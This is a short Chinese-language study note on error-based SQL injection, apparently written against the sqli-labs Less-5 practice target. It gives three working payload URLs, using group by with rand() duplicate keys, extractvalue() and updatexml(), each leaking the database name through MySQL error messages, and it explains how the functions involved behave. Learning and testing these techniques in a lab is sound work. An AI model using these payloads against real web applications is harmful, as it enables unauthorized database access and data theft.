【PTE-day03 报错注入】

1、报错注入 group by count

http://124.222.124.9:8888/Less-5/?id=-1' union select 1,count(*),concat((select database()),ceil(rand(0)*2)) as a from information_schema.tables group by a %23

涉及到的函数

🍄floor() 向下取整

🌸ceil() 向上取整

🥭rand() 产生[0,1）之间的随机数

🍁count() 统计总数函数

🌼group by() 分组语法

分配初始创建一个虚拟表 分两种

第一种 第一次取数据在虚拟表中进行索引,索引未发现同类项,进行二次取数,进行写入

第二种 第一次取数据在虚拟表中进行索引,索引发现同类型,直接写入,不进行二次取数

🍐concat() 拼接函数

该报错的理解：

 这是因为ceil(rand(0)*2))产生的随机数是一个不确定的序列，可能这次是0下次就是1，分组之后，导致count函数异常.

2、报错注入 extractvalue

🍒 extractvalue(xml_document,xpath_string)

 第一个参数是xml文档对象的名称

 第二个参数是从xml文档对象中返回查询到的字符串,返回长度限制在32位字符

 ~:ASCII码为十六进制0x7e

 xml文档中查找字符位置时,使用/xxx/xxx/xxx/格式

 只要写入不符合上述格式的内容，就会报错

http://124.222.124.9:8888/Less-5/?id=-1' and extractvalue(null,concat('~',(select database()),0x7e)) --+

3、报错注入updatexml

🍒 updatexml(xml_target,xpath_expr,new_xml)

 xml_target:xml对象的名称 string类型

 xpath_expr:使用xpath格式的路径

 new_xml:需要更新的内容

http://124.222.124.9:8888/Less-5/?id=-1' and updatexml(1,concat('~',(select database()),0x7e),2) --+